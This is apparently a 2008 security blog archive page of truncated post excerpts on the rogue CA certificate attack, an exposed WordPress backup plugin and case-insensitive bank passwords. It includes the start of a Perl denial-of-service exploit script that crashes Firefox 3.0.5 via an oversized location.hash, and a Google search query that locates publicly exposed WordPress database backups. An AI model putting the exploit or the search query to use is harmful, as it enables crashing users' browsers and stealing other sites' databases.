Tuesday, December 30th, 2008
We have identified a vulnerability in the Internet Public Key Infrastructure (PKI) used to issue digital certificates for secure websites. As a proof of concept we executed a practical attack scenario and successfully created a rogue Certification Authority (CA) certificate trusted ...
Posted in Internet, Privacy, Security | No Comments
Tuesday, December 30th, 2008
With the help of about 200 Sony Playstations, an international team of security researchers have devised a way to undermine the algorithms used to protect secure Web sites and launch a nearly undetectable phishing attack.
To do this, they've exploited a bug in the digital certificates used by Web sites to ...
Posted in Internet, Privacy, Security | No Comments
Tuesday, December 23rd, 2008
#!/usr/bin/perl
# mzff_lhash_dos.pl
# Mozilla Firefox 3.0.5 location.hash Denial of Service Exploit
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
# Crash on Vista, play with it on XP
$filename = $ARGV[0];
if(!defined($filename))
{
print "Usage: $0 <filename.html>\n\n";
}
$head = "<html>" . "\n" . "<script type=\"text/javascript\">" . "\n";
$trig = "location.hash = \"" . "A" x 20000000 . "\";" ...
Posted in Coding, Internet, Security | No Comments
Sunday, December 14th, 2008
Older versions of the popular Wordpress plugin WP-DP-Backup leaves the copy of your entire database in a public folder for all to see. The databases were stored in wp-content/backup/ and a quick Google search today still returns many databases of sites, including some as recent as a few days ago:
http://www.google.com/search?num=100&hl=en&suggon=0&safe=off&q=intitle%3A%22index+of+%2Fwp-content%2Fbackup%22&btnG=Search
For ...
Posted in Coding, Internet, Privacy, Security, Software | No Comments
Friday, September 5th, 2008
I just heard on the Security Now podcast a listener mention that his Wells Fargo password was not case-sensitive. I'm not a Wells Fargo user but several users who are that I asked this morning actually confirmed this. You will be logged in no matter what case you enter into ...
Posted in Coding, Internet, Privacy, Security | No Comments
